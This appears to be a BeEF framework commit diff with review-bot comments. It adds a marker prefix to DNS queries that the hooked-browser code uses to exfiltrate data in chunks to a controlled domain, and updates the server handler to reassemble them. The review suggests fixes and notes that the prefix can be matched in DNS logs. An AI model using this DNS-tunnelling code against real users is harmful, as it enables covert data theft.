#970 Added string to DNS requests to differentiate between normal and data-extrusion DNS requests

antisnatchor
2014-06-29 13:04:51 +02:00
parent f7df45ebd1
commit d1688395ae
2 changed files with 11 additions and 4 deletions


@@ -71,11 +71,13 @@ beef.net.dns = {
var segments = encodedData.chunk(max_data_segment_length);
var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
//TODO remove this
console.log(segments.length);
for (var seq=1; seq<=segments.length; seq++) {
sendQuery(msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
}
// callback - returns the number of queries sent
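Review bot: The added `console.log(segments.length);` is committed together with its own `//TODO remove this` comment, so debug output ships in this change; drop both lines before merging instead of carrying the TODO. The `"0xb3"` marker is a bare literal here and again in the Ruby handler, so the two can drift apart silently. The comment on `ident` could say that the server matches this exact prefix at the start of the name, e.g. `// must equal the prefix tested in extensions/dns/dns.rb`. For anyone reading this from the monitoring side, a constant prefix on the first label of every tunnel query is a stable string to match in DNS logs. The enclosing function starts and ends outside the hunk.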


@@ -140,9 +140,14 @@ module BeEF
@lock.synchronize do
print_debug "Received DNS request (name: #{name} type: #{format_resource(resource)})"
# no need to parse AAAA resources when data is extruded from client
if format_resource(resource) == 'A'
reconstruct(name)
# no need to parse AAAA resources when data is extruded from client. Also we check if the FQDN starts with the 0xb3 string.
# this 0xb3 is convenient to clearly separate DNS requests used to extrude data from normal DNS requests than should be resolved by the DNS server.
if format_resource(resource) == 'A' and name.match(/^0xb3/)
reconstruct(name.split('0xb3').last)
catch (:done) do
transaction.fail!(:NXDomain)
end
return
end
catch (:done) do
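Review bot: `name.split('0xb3').last` on the reconstruct line keeps only the text after the last occurrence of the marker, so a query whose message id or data segment contains `0xb3` again is silently truncated before `reconstruct` sees it. Strip only the leading marker instead, e.g. `reconstruct(name.sub(/\A0xb3/, ''))`. The guard above it uses `^`, which in Ruby matches at the start of any line, not only the start of the string, and `and`, whose low precedence is easy to trip over; `if format_resource(resource) == 'A' && name.match(/\A0xb3/)` states the intent exactly. `name` comes straight from a network request, and this branch passes anything carrying the prefix to `reconstruct`, whose own validation is not visible here and is worth confirming. The method and the trailing `catch (:done) do` block continue outside the hunk.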